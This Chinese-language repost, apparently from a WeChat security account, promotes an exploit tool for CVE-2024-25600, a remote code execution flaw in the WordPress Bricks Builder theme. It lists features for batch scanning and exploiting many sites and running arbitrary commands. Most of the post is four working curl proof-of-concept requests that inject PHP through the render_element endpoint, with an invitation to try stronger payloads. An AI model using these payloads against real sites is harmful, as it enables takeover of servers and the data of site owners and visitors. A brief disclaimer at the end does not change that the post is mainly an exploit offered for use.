工具描述
互动模式:与目标网站实时互动🕹️。
批处理模式:扫描并利用列表中的多个网站📋。
命令执行:在目标服务器上执行任意命令⚙️。
有效负载定制:选择不同的有效负载进行利用,包括generic、carousel、container和code🧰。
RCE确认:仅显示和记录已确认RCE的URL的选项✔️。
图片来源:大仙安全说
本公开提供的基础PoC如下:
第一个概念验证:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element
-H "Content-Type: application/json"
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
第二个概念验证:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element
-H "Content-Type: application/json"
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
第三个概念验证:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element
-H "Content-Type: application/json"
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": "1",
"loopElement": {
"settings": {
"query": {
"useQueryEditor": "",
"queryEditor": "throw new Exception(`id`);"
}
}
}
}'
第四个概念验证(对旧版本有效):
curl -k -X POST "http://[HOST]/index.php?rest_route=/bricks/v1/render_element"
-H "Content-Type: application/json"
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "code",
"settings": {
"executeCode": "true",
"code": "<?php throw new Exception(`id`);?>"
}
}
}'
注意:第四个 PoC 对于旧版本的 Bricks Builder(在版本 1.8 上测试)特别有效,以前的 PoC 可能不起作用。
额外的有效负载可能会产生更好的结果。如果我的漏洞利用或概念验证对您不起作用,我鼓励您尝试其他有效负载以找到更有效的解决方案。
https://github.com/Chocapikk/CVE-2024-25600
原文始发于微信公众号(Hack分享吧):CVE-2024-25600 漏洞利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论